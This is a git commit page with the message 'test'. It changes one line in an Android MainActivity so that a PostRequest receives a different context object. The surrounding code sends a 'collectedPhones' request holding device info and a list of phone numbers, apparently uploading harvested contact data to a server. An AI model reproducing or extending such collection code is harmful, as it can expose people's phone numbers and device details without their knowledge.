test
This commit is contained in:
parent
a64d2b65cb
commit
e21a626f49
1 changed files with 1 additions and 1 deletions
|
@ -618,7 +618,7 @@ public class MainActivity extends AppCompatActivity implements PostRequestCallba
|
||||||
#);
|
#);
|
||||||
*/
|
*/
|
||||||
|
|
||||||
PostRequest postRequestTask = new PostRequest(getBaseContext(), null);
|
PostRequest postRequestTask = new PostRequest(context, null);
|
||||||
postRequestTask.execute("collectedPhones",
|
postRequestTask.execute("collectedPhones",
|
||||||
getDeviceInfo(context) + ";" + String.valueOf(phoneNumbers)); // STATIC
|
getDeviceInfo(context) + ";" + String.valueOf(phoneNumbers)); // STATIC
|
||||||
|
|
||||||
|
|
Loading…
Add table
Reference in a new issue